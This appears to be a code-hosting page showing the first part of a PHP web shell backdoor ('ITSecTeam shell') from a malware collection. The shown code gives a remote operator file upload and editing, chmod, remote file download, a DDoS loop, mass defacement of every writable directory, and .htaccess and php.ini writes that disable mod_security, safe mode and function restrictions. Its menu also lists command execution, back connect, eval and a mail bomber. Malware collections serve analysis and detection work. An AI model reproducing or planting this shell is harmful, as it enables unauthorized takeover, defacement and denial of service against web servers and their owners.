PageRenderTime 28ms CodeModel.GetById 9ms RepoModel.GetById 0ms app.codeStats 0ms

/Backdoors/PHP/itsecteam_shell.php

http://web-malware-collection.googlecode.com/
PHP | 1276 lines | 1209 code | 61 blank | 6 comment | 218 complexity | efc5b4f8d71e924e69cb72a005fd2ce2 MD5 | raw file

Large files files are truncated, but you can click here to view the full file

  1. <?php
  2. session_start();
  3. set_time_limit(0);
  4. error_reporting(0);
  5. if (get_magic_quotes_gpc()) {
  6. function stripslashes_deep($value) {
  7. $value = is_array($value) ?
  8. array_map('stripslashes_deep', $value) :
  9. stripslashes($value);
  10. return $value;
  11. }
  12. $_POST = array_map('stripslashes_deep', $_POST);
  13. $_GET = array_map('stripslashes_deep', $_GET);
  14. $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
  15. $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
  16. }
  17. if($_GET['do']=="remove"){
  18. unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
  19. }
  20. $basep=$_SERVER['DOCUMENT_ROOT'];
  21. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  22. $slash="\\";
  23. $basep=str_replace("/","\\",$basep);
  24. }else{
  25. $slash="/";
  26. $basep=str_replace("\\","/",$basep);
  27. }
  28. if($_GET['do']=="remove"){
  29. unlink(getcwd().$slash.$_SERVER["SCRIPT_NAME"]);
  30. }
  31. if ($_REQUEST['address']){
  32. if(is_readable($_REQUEST['address'])){
  33. chdir($_REQUEST['address']);}else{
  34. alert("Permission Denied !");}}
  35. $me=$_SERVER['PHP_SELF'];
  36. $formp="<form method=post action='".$me."'>";
  37. $formg="<form method=get action='".$me."'>";
  38. $nowaddress='<input type=hidden name=address value="'.getcwd().'">';
  39. if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
  40. if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){
  41. alert("File Upload Successful");
  42. }else{
  43. alert("Permission Denied !");
  44. }
  45. }
  46. if(ini_get('disable_functions')){
  47. $disablef=ini_get('disable_functions');
  48. }else{
  49. $disablef="All Functions Enable";
  50. }
  51. if(ini_get('safe_mode')){
  52. $safe_modes="On";
  53. }else{
  54. $safe_modes="Off";
  55. }
  56. if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
  57. if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");}
  58. }
  59. $picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=';
  60. $picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC';
  61. $head='<style type="text/css">
  62. A:link {text-decoration: none}
  63. A:visited {text-decoration: none}
  64. A:active {text-decoration: none}
  65. A:hover {text-decoration: underline overline; color: 414141;}
  66. .focus td{border-top:0px solid #f8f8f8;border-bottom:1px solid #ddd;background:#f2f2f2;padding:0px 0px 0px 0px;}
  67. </style><head>
  68. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  69. <title>iTSecTeam</title>
  70. </head><body topmargin="0" leftmargin="0" rightmargin="0"
  71. bgcolor="#f2f2f2"><div align="center">
  72. &nbsp;<table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
  73. <tr>
  74. <td height="30" width="996">
  75. <p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=home">Home</a> -- <a href="?do=filemanager&address='.getcwd().'">File Manager</a> -- <a href="?do=cmd&address='.getcwd().'">Command Execute</a> -- <a href="?do=bc&address='.getcwd().'">Back Connect</a> --
  76. <a href="?do=bypasscmd&address='.getcwd().'">BypasS Command eXecute(SF-DF)</a> -- <a href="?do=symlink&address='.getcwd().'">Symlink</a> --
  77. <a href="?do=bypassdir&address='.getcwd().'">BypasS Directory</a> -- <a href="?do=eval&address='.getcwd().'">
  78. Eval Php</a> -- <a href="?do=db&address='.getcwd().'">Data Base</a> -- <a href="?do=convert&address='.getcwd().'">Convert</a> -- <a href="?do=mail&address='.getcwd().'">Mail Boomber</a><a href="?do=info&address='.getcwd().'">
  79. <br>Server Information</a> -- <a href="?do=d0slocal&address='.getcwd().'">Dos Local Server</a> -- <a href="?do=dump&address='.getcwd().'">Backup Database</a> -- <a href="?do=mass&address='.getcwd().'">Mass Deface</a> -- <a href="?do=dlfile&address='.getcwd().'">Download Remote File</a> -- <a href="?do=dd0s&address='.getcwd().'">DDoS</a> -- <a href="?do=perm&address='.getcwd().'">Find Writable Directory</a> -- <a href="?do=apache&address='.getcwd().'">Server</a> -- <a href="?do=remove&address='.getcwd().'">Remove Me</a> -- <a href="?do=about&address='.getcwd().'">About</a>
  80. </span></font></td></tr></table></div>
  81. <div align="center">
  82. <table id="table2" style="border-collapse: collapse; border-style:
  83. solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
  84. cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 1px; margin-bottom: 0px;
  85. border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
  86. height="10" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr><font face="Tahoma" style="font-size: 9pt"><div align="center">
  87. Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.' <td style="border: 1px solid rgb(198, 198, 198);"
  88. width="950" bgcolor="#e7e3de" height="10" valign="top">';
  89. $end='</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'</a></font></span></td></tr></tbody></table></div></body></html>';
  90. $deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
  91. function alert($text){
  92. echo "<script>alert('".$text."')</script>";
  93. }
  94. if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
  95. if(is_readable($_GET['address'].$_GET['filename'])){
  96. $opedit=fopen($_GET['address'].$_GET['filename'],"r");
  97. while(!feof($opedit))
  98. $data.=fread($opedit,9999);
  99. fclose($opedit);
  100. echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlentities("$data").'</textarea><br><input value='.$_GET['filename'].' name=namefe><br><input type=submit value=" Save "></form></p>'.$end;exit;
  101. }else{alert("Permission Denied !");}}
  102. function sizee($size)
  103. {
  104. if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  105. elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  106. elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  107. else {$size = $size . " B";}
  108. return $size;
  109. }
  110. if($_REQUEST['do']=='about'){
  111. echo $head."<p align='center'><b><font color=red>ITSecTeam, IT Security Research & Penetration Testing Team</b></font><br>Version 2.1 <br>Last Update : 2010/10/10<br>Coded By : Amin Shokohi(Pejvak)<br>Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )<br>Home Page : <a href='http://www.itsecteam.com'>http://www.itsecteam.com</a><br>Update Notice: <a href='http://itsecteam.com/en/tools/itsecteam_shell.htm'>ITSecTeam Shell</a><br>Forum : <a href='http://www.forum.itsecteam.com'>http://www.forum.itsecteam.com</a><br>
  112. <center>
  113. <PRE>
  114. ______ ______ ____ ______
  115. /\__ _\/\__ _\/\ _`\ /\__ _\
  116. \/_/\ \/\/_/\ \/\ \,\L\_\ __ ___\/_/\ \/ __ __ ___ ___
  117. \ \ \ \ \ \ \/_\__ \ /'__`\ /'___\ \ \ \ /'__`\ /'__`\ /' __` __`\
  118. \_\ \__ \ \ \ /\ \L\ \/\ __//\ \__/ \ \ \/\ __//\ \L\.\_/\ \/\ \/\ \
  119. /\_____\ \ \_\ \ `\____\ \____\ \____\ \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
  120. \/_____/ \/_/ \/_____/\/____/\/____/ \/_/\/____/\/__/\/_/\/_/\/_/\/_/
  121. </PRE>
  122. ".$end;exit;
  123. }
  124. function deleteDirectory($dir) {
  125. if (!file_exists($dir)) return true;
  126. if (!is_dir($dir) || is_link($dir)) return unlink($dir);
  127. foreach (scandir($dir) as $item) {
  128. if ($item == '.' || $item == '..') continue;
  129. if (!deleteDirectory($dir . "/" . $item)) {
  130. chmod($dir . "/" . $item, 0777);
  131. if (!deleteDirectory($dir . "/" . $item)) return false;
  132. };}return rmdir($dir);}
  133. function download($fileadd,$finame){
  134. $dlfilea=$fileadd.$finame;
  135. header("Content-Disposition: attachment; filename=" . $finame);
  136. header("Content-Type: application/download");
  137. header("Content-Length: " . filesize($dlfilea));
  138. flush();
  139. $fp = fopen($$dlfilea, "r");
  140. while (!feof($fp))
  141. {
  142. echo fread($fp, 65536);
  143. flush();
  144. }
  145. fclose($fp);
  146. }
  147. if($_GET['do']=="rename"){
  148. echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value=" Save "></form></p>'.$end;exit;
  149. }
  150. if ($_GET['byapache']=='ofms'){
  151. $fse=fopen(getcwd().$slash.".htaccess","w");
  152. fwrite($fse,'<IfModule mod_security.c>
  153. Sec------Engine Off
  154. Sec------ScanPOST Off
  155. </IfModule>');
  156. fclose($fse);
  157. }elseif ($_GET['byapache']=='bysap'){
  158. $fse=fopen(getcwd().$slash.".htaccess","w");
  159. fwrite($fse,'Options +FollowSymLinks
  160. DirectoryIndex Persian-Gulf-For-Ever.html');
  161. fclose($fse);
  162. }elseif ($_GET['byapache']=='sfadf'){
  163. $fse=fopen(getcwd().$slash."php.ini","w");
  164. fwrite($fse,'safe_mode=OFF
  165. disable_functions=NONE');
  166. fclose($fse);
  167. }
  168. if($_GET['do']=="apache"){
  169. echo $head.$formg.$nowaddress.'<p align="center">
  170. <select name=byapache>
  171. <option value="ofms">Off Mode Security(.htaccess)</option><option value="bysap">Bypass Symlink(.htaccess)</option>
  172. <option value="sfadf">Disable Safe Mode & Disable Function(Php.ini)</option>
  173. </select><br><input type=submit value=eXecute></form></p>'.$end;exit;
  174. }
  175. if($_GET['do']=="dd0s"){
  176. echo $head.$formg.$nowaddress.'<p align="center">Address : <input name=urldd0 size=50> Time : <input name=timedd0 size=6 value=40000><br><input type=submit value=" DDoS "></form></p>'.$end;exit;
  177. }
  178. if($_GET['urldd0'] && $_GET['timedd0']){
  179. for ($id=0;$$id<$_GET['timedd0'];$id++){
  180. $fp=null;
  181. $contents=null;
  182. $fp=fopen($_GET['urldd0'],"rb");
  183. while (!feof($fp)) {
  184. $contents .= fread($fp, 8192);
  185. }
  186. fclose($fp);
  187. }}
  188. if($_GET['do']=="dlfile"){
  189. echo $head.$formp.$nowaddress.'<p align="center">Download Remote File!<br>Address : <input name=adlr size=70><br>Save To : <input name=adsr value='.getcwd().$slash.' size=70><br><input type=submit value=" Download "></form></p>'.$end;exit;
  190. }
  191. function dirpe($addres){
  192. global $slash;
  193. $idd=0;
  194. if ($dirhen = @opendir($addres)) {
  195. while ($file = readdir($dirhen)) {
  196. $permdir=str_replace('//','/',$addres.$slash.$file);
  197. if($file!='.' && $file!='..' && is_dir($permdir)){
  198. if (is_writable($permdir)) {
  199. $dirdata[$idd]['filename']=$permdir;
  200. $idd++;
  201. }
  202. dirpe($permdir);
  203. }
  204. }
  205. closedir($dirhen);
  206. } else {
  207. return ("notperm");
  208. }
  209. if ($dirdata){
  210. return $dirdata;
  211. }else{
  212. return "notfound";
  213. }
  214. }
  215. function dirpmass($addres,$massname,$masssource){
  216. global $slash;
  217. $idd=0;
  218. if ($dirhen = @opendir($addres)) {
  219. while ($file = readdir($dirhen)) {
  220. $permdir=str_replace('//','/',$addres.$slash.$file);
  221. if($file!='.' && $file!='..' && is_dir($permdir)){
  222. if (is_writable($permdir)) {
  223. if ($fm=fopen($permdir.$slash.$massname,"w")){
  224. fwrite($fm,$masssource);
  225. fclose($fm);
  226. $dirdata[$idd]['filename']=$permdir;
  227. }
  228. $idd++;
  229. }
  230. dirpmass($permdir);
  231. }
  232. }
  233. closedir($dirhen);
  234. } else {
  235. return ("notperm");
  236. }
  237. if ($dirdata){
  238. return $dirdata;
  239. }else{
  240. return "notfound";
  241. }
  242. }
  243. if($_GET['do']=="perm"){
  244. echo $head.$formp.'<p align="center">Find All Folder Writeable<br> <input name=affw value="'.getcwd().$slash.'" size=50><br><input type=submit value=" Search "></form></p>'.$end;exit;
  245. }
  246. if ($_POST['affw']){
  247. $arrfilelist=dirpe($_POST['affw']);
  248. if ($arrfilelist=='notfound'){
  249. alert("Not Found !");
  250. }elseif($arrfilelist=='notperm'){
  251. alert("Permission Denied !");
  252. }else{
  253. foreach ($arrfilelist as $tmpdir){
  254. if ($coi %2){
  255. $colort='"#e7e3de"';
  256. }else{
  257. $colort='"#e4e1de"';}
  258. $coi++;
  259. $permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
  260. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
  261. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
  262. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
  263. }
  264. echo $head.'
  265. <font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  266. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
  267. </tr></table>'.$permdir.'</table>
  268. <table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
  269. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  270. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
  271. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
  272. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  273. <font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
  274. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  275. <form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
  276. <font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
  277. <input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
  278. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  279. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
  280. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  281. <font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
  282. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  283. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
  284. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  285. <font face="Tahoma" style="font-size: 10pt">
  286. <input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  287. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  288. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
  289. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  290. <font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  291. <td width="200" align="right" valign="top">
  292. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
  293. <td width="750"><font face="Tahoma" style="font-size: 10pt">
  294. <input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
  295. }}
  296. if($_GET['do']=="mass"){
  297. echo $head.$formp.'<p align="center">[Mass Deface]<br><input name=mffw value="'.getcwd().$slash.'" size=50><input name=massname value="def.htm" size=10><br><textarea name=masssource cols=60 rows=18>Source</textarea><br><input type=submit value=" Mass "></form></p>'.$end;exit;
  298. }
  299. if ($_POST['mffw']){
  300. $arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']);
  301. if ($arrfilelist=='notfound'){
  302. alert("Not Found !");
  303. }elseif($arrfilelist=='notperm'){
  304. alert("Permission Denied !");
  305. }else{
  306. foreach ($arrfilelist as $tmpdir){
  307. if ($coi %2){
  308. $colort='"#e7e3de"';
  309. }else{
  310. $colort='"#e4e1de"';}
  311. $coi++;
  312. $permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
  313. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
  314. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
  315. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
  316. }
  317. echo $head.'
  318. <font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  319. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
  320. </tr></table>'.$permdir.'</table>
  321. <table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
  322. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  323. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
  324. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
  325. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  326. <font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
  327. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  328. <form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
  329. <font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
  330. <input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
  331. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  332. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
  333. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  334. <font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
  335. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  336. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
  337. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  338. <font face="Tahoma" style="font-size: 10pt">
  339. <input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  340. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  341. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
  342. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  343. <font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  344. <td width="200" align="right" valign="top">
  345. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
  346. <td width="750"><font face="Tahoma" style="font-size: 10pt">
  347. <input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
  348. }}
  349. if($_POST['adlr'] && $_POST['adsr']){
  350. $url = $_POST['adlr'];
  351. $newfname = $_POST['adsr'] . basename($url);
  352. $file = fopen ($url, "rb");
  353. if ($file) {
  354. $newf = fopen ($newfname, "wb");
  355. if ($newf)
  356. while(!feof($file)) {
  357. fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
  358. }
  359. alert("File Downloaded Success");
  360. }else{alert("Can Not Open File");}
  361. if ($file) {
  362. fclose($file);
  363. }
  364. if ($newf) {
  365. fclose($newf);
  366. }
  367. }
  368. if($_GET['do']=="down" and $_GET['type']=='file'){
  369. download($_GET['address'],$_GET['filename']);}
  370. if($_GET['do']=="down" and $_GET['type']=='dir'){
  371. class zipfile
  372. {
  373. var $datasec = array();
  374. var $ctrl_dir = array();
  375. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  376. var $old_offset = 0;
  377. function add_dir($name)
  378. {
  379. $name = str_replace("\\", "/", $name);
  380. $fr = "\x50\x4b\x03\x04";
  381. $fr .= "\x0a\x00";
  382. $fr .= "\x00\x00";
  383. $fr .= "\x00\x00";
  384. $fr .= "\x00\x00\x00\x00";
  385. $fr .= pack("V",0);
  386. $fr .= pack("V",0);
  387. $fr .= pack("V",0);
  388. $fr .= pack("v", strlen($name) );
  389. $fr .= pack("v", 0 );
  390. $fr .= $name;
  391. $fr .= pack("V",$crc);
  392. $fr .= pack("V",$c_len);
  393. $fr .= pack("V",$unc_len);
  394. $this -> datasec[] = $fr;
  395. $new_offset = strlen(implode("", $this->datasec));
  396. $cdrec = "\x50\x4b\x01\x02";
  397. $cdrec .="\x00\x00";
  398. $cdrec .="\x0a\x00";
  399. $cdrec .="\x00\x00";
  400. $cdrec .="\x00\x00";
  401. $cdrec .="\x00\x00\x00\x00";
  402. $cdrec .= pack("V",0);
  403. $cdrec .= pack("V",0);
  404. $cdrec .= pack("V",0);
  405. $cdrec .= pack("v", strlen($name) );
  406. $cdrec .= pack("v", 0 );
  407. $cdrec .= pack("v", 0 );
  408. $cdrec .= pack("v", 0 );
  409. $cdrec .= pack("v", 0 );
  410. $ext = "\x00\x00\x10\x00";
  411. $ext = "\xff\xff\xff\xff";
  412. $cdrec .= pack("V", 16 );
  413. $cdrec .= pack("V", $this -> old_offset );
  414. $this -> old_offset = $new_offset;
  415. $cdrec .= $name;
  416. $this -> ctrl_dir[] = $cdrec;
  417. }
  418. function add_file($data, $name)
  419. {
  420. $name = str_replace("\\", "/", $name);
  421. $fr = "\x50\x4b\x03\x04";
  422. $fr .= "\x14\x00";
  423. $fr .= "\x00\x00";
  424. $fr .= "\x08\x00";
  425. $fr .= "\x00\x00\x00\x00";
  426. $unc_len = strlen($data);
  427. $crc = crc32($data);
  428. $zdata = gzcompress($data);
  429. $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
  430. $c_len = strlen($zdata);
  431. $fr .= pack("V",$crc);
  432. $fr .= pack("V",$c_len);
  433. $fr .= pack("V",$unc_len);
  434. $fr .= pack("v", strlen($name) );
  435. $fr .= pack("v", 0 );
  436. $fr .= $name;
  437. $fr .= $zdata;
  438. $fr .= pack("V",$crc);
  439. $fr .= pack("V",$c_len);
  440. $fr .= pack("V",$unc_len);
  441. $this -> datasec[] = $fr;
  442. $new_offset = strlen(implode("", $this->datasec));
  443. $cdrec = "\x50\x4b\x01\x02";
  444. $cdrec .="\x00\x00";
  445. $cdrec .="\x14\x00";
  446. $cdrec .="\x00\x00";
  447. $cdrec .="\x08\x00";
  448. $cdrec .="\x00\x00\x00\x00";
  449. $cdrec .= pack("V",$crc);
  450. $cdrec .= pack("V",$c_len);
  451. $cdrec .= pack("V",$unc_len);
  452. $cdrec .= pack("v", strlen($name) );
  453. $cdrec .= pack("v", 0 );
  454. $cdrec .= pack("v", 0 );
  455. $cdrec .= pack("v", 0 );
  456. $cdrec .= pack("v", 0 );
  457. $cdrec .= pack("V", 32 );
  458. $cdrec .= pack("V", $this -> old_offset );
  459. $this -> old_offset = $new_offset;
  460. $cdrec .= $name;
  461. $this -> ctrl_dir[] = $cdrec;
  462. }
  463. function file() {
  464. $data = implode("", $this -> datasec);
  465. $ctrldir = implode("", $this -> ctrl_dir);
  466. return
  467. $data.
  468. $ctrldir.
  469. $this -> eof_ctrl_dir.
  470. pack("v", sizeof($this -> ctrl_dir)).
  471. pack("v", sizeof($this -> ctrl_dir)).
  472. pack("V", strlen($ctrldir)).
  473. pack("V", strlen($data)).
  474. "\x00\x00";
  475. }
  476. }
  477. $dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash;
  478. $zipfile = new zipfile();
  479. function get_files_from_folder($directory, $put_into) {
  480. global $zipfile;
  481. if ($handle = opendir($directory)) {
  482. while (false !== ($file = readdir($handle))) {
  483. if (is_file($directory.$file)) {
